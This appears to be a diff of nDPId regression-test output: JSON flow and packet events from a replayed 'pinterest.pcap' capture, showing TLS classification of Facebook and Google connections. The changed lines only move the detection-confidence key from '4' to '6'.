00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3659,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1605289715301,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289715301,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoDKIDwMAAT+s6wDAAAAAMqAcsBIEmLB5kd7IUo3\/YpAbvIXBJtCi5yubyHoBJXgCqsAAACBAV4AQMDAwQCCArCuSZZuEzcCg=="} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3662,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1605289715301,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289715301,"pkt":"qtsDr8lk5EKm5WPyht1gCiKuACAGQCoBywEgSYsHmR3shSjf9ikqAyiA8DAAE\/rOsAwAAAADyFwBu3K5vIcSbQovgBAB+66iAAABAQgKuEzcJcK5Jlk="} -00970{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3667,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289715274,"flow_last_seen":1605289715301,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289715301,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f030:13:face:b00c::3","src_port":51292,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connect.facebook.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00995{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3797,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289715221,"flow_last_seen":1605289715321,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605289715321,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54416,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"apis.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01011{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3820,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289715274,"flow_last_seen":1605289715333,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1380,"flow_tot_l4_payload_len":1897,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1605289715333,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f030:13:face:b00c::3","src_port":51292,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3","client_requested_server_name":"connect.facebook.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00970{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3667,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289715274,"flow_last_seen":1605289715301,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289715301,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f030:13:face:b00c::3","src_port":51292,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connect.facebook.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00995{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3797,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289715221,"flow_last_seen":1605289715321,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605289715321,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54416,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"apis.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01011{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3820,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289715274,"flow_last_seen":1605289715333,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1380,"flow_tot_l4_payload_len":1897,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1605289715333,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f030:13:face:b00c::3","src_port":51292,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3","client_requested_server_name":"connect.facebook.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00628{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6497,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289715782,"flow_last_seen":1605289715782,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289715782,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f11f:83:face:b00c::25de","src_port":60340,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6497,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1605289715782,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289715782,"pkt":"qtsDr8lk5EKm5WPyht1gAWIEACgGQCoBywEgSYsHmR3shSjf9ikqAyiA8R8Ag\/rOsAwAACXe67QBu2RbtWoAAAAAoAL9IBbyAAACBAWgBAIICmcfa8wAAAAAAQMDBw=="} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6878,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1605289715833,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289715833,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoDKIDxHwCD+s6wDAAAJd4qAcsBIEmLB5kd7IUo3\/YpAbvrtAAp+EJkW7VroBJXgNkoAAACBAV4AQMDAwQCCArCuShfZx9rzA=="} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6886,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1605289715833,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289715833,"pkt":"qtsDr8lk5EKm5WPyht1gAWIEACAGQCoBywEgSYsHmR3shSjf9ikqAyiA8R8Ag\/rOsAwAACXe67QBu2RbtWsAKfhDgBAB+10HAAABAQgKZx9r\/8K5KF8="} -00969{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6914,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289715782,"flow_last_seen":1605289715834,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289715834,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f11f:83:face:b00c::25de","src_port":60340,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.facebook.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00969{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6914,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289715782,"flow_last_seen":1605289715834,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289715834,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f11f:83:face:b00c::25de","src_port":60340,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.facebook.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00619{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7909,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289715966,"flow_last_seen":1605289715966,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289715966,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200a","src_port":47790,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7909,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1605289715966,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289715966,"pkt":"qtsDr8lk5EKm5WPyht1gDvs7ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACAKuq4Bu2\/h7B4AAAAAoAL9IFQFAAACBAWgBAIICqkvSd0AAAAAAQMDBw=="} -01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8857,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289715782,"flow_last_seen":1605289716018,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1380,"flow_tot_l4_payload_len":1897,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1605289716018,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f11f:83:face:b00c::25de","src_port":60340,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.facebook.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8857,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289715782,"flow_last_seen":1605289716018,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1380,"flow_tot_l4_payload_len":1897,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1605289716018,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f11f:83:face:b00c::25de","src_port":60340,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.facebook.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8901,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1605289716021,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289716021,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgWAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbu6rg79HT9v4ewfoBJXgOHBAAACBAV4AQMDAwQCCArCuSkJqS9J3Q=="} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8902,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1605289716021,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289716021,"pkt":"qtsDr8lk5EKm5WPyht1gDvs7ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACAKuq4Bu2\/h7B8O\/R1AgBAB+2WcAAABAQgKqS9KFMK5KQk="} -00978{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8903,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289715966,"flow_last_seen":1605289716024,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289716024,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200a","src_port":47790,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"content-autofill.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01019{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8994,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289715966,"flow_last_seen":1605289716084,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605289716084,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200a","src_port":47790,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"content-autofill.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00978{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8903,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289715966,"flow_last_seen":1605289716024,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289716024,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200a","src_port":47790,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"content-autofill.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01019{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8994,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289715966,"flow_last_seen":1605289716084,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605289716084,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200a","src_port":47790,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"content-autofill.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00627{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9522,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289716168,"flow_last_seen":1605289716168,"flow_idle_time":7580000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1605289716168,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2003","src_port":43562,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00721{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9522,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1605289716168,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":244,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":244,"pkt_l4_len":190,"thread_ts_msec":1605289716168,"pkt":"qtsDr8lk5EKm5WPyht1gB32\/AL4GQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACADqioBu9lam\/a\/4e68gBgE1TyJAAABAQgKZPSVcMK4jAQXAwMAmbA2YtBqXOwsPZhf0xplQUhs5uebiQ6HrXX0rQcB3CzDNqt6KEFEtOrnLbiyKoAl0\/PfpLU5lSyfN4b6GWAPMuxRzKK1mYHeU6cm19ssJsGj28uoKpDNJuLbc68jHie5jcE8\/swMHjb\/rsshDlUuBkbS0PBg+fBq\/uDg8aBU7dQCoscpqfDhz7OaLw8PBcid6Woaoneonk0XRQ=="} -00675{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9522,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289716168,"flow_last_seen":1605289716168,"flow_idle_time":7580000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1605289716168,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2003","src_port":43562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00675{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9522,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289716168,"flow_last_seen":1605289716168,"flow_idle_time":7580000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1605289716168,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2003","src_port":43562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9523,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1605289716168,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":209,"pkt_l4_len":155,"thread_ts_msec":1605289716168,"pkt":"qtsDr8lk5EKm5WPyht1gB32\/AJsGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACADqioBu9lanJS\/4e68gBgE1YEBAAABAQgKZPSVcMK4jAQXAwMAT0+KQ56NjlMHGW+d6G5ddduewRHnDyQJNOhFGSBeS16m4KVAja7XHlyuQrxKoq24Sn8bLVvUYgiRl0ogV926yAF+\/eBnK0DefdFCPgWpP6kXAwMAIh\/Eke2gVwnwKuWIWa9HbFAoJdRk5f1TigycRztSwvhmbFo="} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9663,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1605289716192,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289716192,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgFAAAAAAAAIAMqAcsBIEmLB5kd7IUo3\/YpAbuqKr\/h7rzZWpyUgBALf8h0AAABAQgKwrkp2GT0lXA="} -00685{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9768,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605289716168,"flow_last_seen":1605289716199,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":21339,"flow_avg_l4_payload_len":666,"midstream":1,"thread_ts_msec":1605289716199,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2003","src_port":43562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00685{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9768,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605289716168,"flow_last_seen":1605289716199,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":21339,"flow_avg_l4_payload_len":666,"midstream":1,"thread_ts_msec":1605289716199,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2003","src_port":43562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00620{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14612,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289717548,"flow_last_seen":1605289717548,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289717548,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200d","src_port":40894,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14612,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1605289717548,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289717548,"pkt":"qtsDr8lk5EKm5WPyht1gD67DACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACANn74Bu+7PaD4AAAAAoAL9ID+FAAACBAWgBAIICjGG9eUAAAAAAQMDBw=="} 